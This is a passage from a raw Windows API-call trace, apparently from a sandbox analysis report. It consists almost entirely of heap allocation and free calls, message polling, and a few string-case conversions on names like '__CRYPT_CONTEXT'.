hHeap=0x970000) returned 1 [0131.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0131.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0131.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0131.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0131.905] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0131.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0131.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0131.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0131.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0131.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ce8 [0131.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0131.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0131.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b68 [0131.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0131.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0131.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0131.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0131.905] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0131.905] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0131.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0131.905] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0131.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0131.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0131.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0131.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0131.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0131.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0131.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0131.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0131.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0131.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0131.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0131.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0131.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0131.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0131.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0131.906] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0131.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0131.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0131.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0131.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0131.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0131.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0131.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0131.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0131.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0131.906] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0131.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0131.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0131.906] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0131.906] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0131.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0131.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0131.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0131.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0131.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0131.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0131.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0131.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0131.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0131.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0131.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0131.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0131.907] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0131.907] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0131.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0131.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0131.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0131.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0131.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d38 [0131.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0131.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0131.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0131.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0131.907] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0131.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0131.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0131.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0131.908] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0131.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0131.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0131.908] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0131.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0131.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0131.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50920 [0131.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0131.908] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0131.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0131.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe68 [0131.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0131.908] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0131.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe68 | out: hHeap=0x970000) returned 1 [0131.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0131.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506c8 [0131.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0131.908] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0131.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0131.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0131.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0131.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0131.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0131.908] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0131.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0131.908] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0131.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0131.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0131.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0131.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0131.909] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0131.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a08 | out: hHeap=0x970000) returned 1 [0131.909] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0131.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fdc0 [0131.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0131.909] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0131.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fdc0 | out: hHeap=0x970000) returned 1 [0131.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0131.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506c8 [0131.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0131.909] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0131.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0131.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0131.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0131.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0131.909] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0131.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0131.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0131.909] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0131.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0131.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cc8 | out: hHeap=0x970000) returned 1 [0131.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0131.909] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0131.909] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0131.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0131.909] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0131.909] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0131.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0131.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0131.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0131.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0131.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0131.910] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0131.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0131.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0131.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506f8 [0131.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0131.910] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0131.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0131.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0131.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0131.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0131.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0131.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0131.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54eb8 | out: hHeap=0x970000) returned 1 [0131.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0131.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0131.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0131.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0131.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0131.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0131.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0131.910] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0131.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0131.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0131.910] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0131.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0131.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54080 [0131.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0131.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0131.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0131.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0131.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0131.911] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0131.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0131.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0131.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50b48 [0131.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0131.911] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0131.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0131.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0131.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0131.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0131.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0131.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0131.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0131.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0131.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0131.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0131.911] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0131.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0131.911] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0131.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0131.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0131.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0131.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0131.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0131.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0131.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54080 | out: hHeap=0x970000) returned 1 [0131.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0131.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0131.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0131.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0131.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0131.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0131.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0131.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0131.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0131.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0131.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0131.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0131.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0131.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0131.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0131.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0131.912] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0131.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0131.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0131.912] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0131.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0131.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0131.912] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0131.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0131.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0131.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0131.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0131.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0131.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0131.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0131.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0131.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0131.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0131.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0131.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0131.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0131.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0131.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0131.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0131.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0131.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0131.913] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0131.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0131.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0131.913] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: 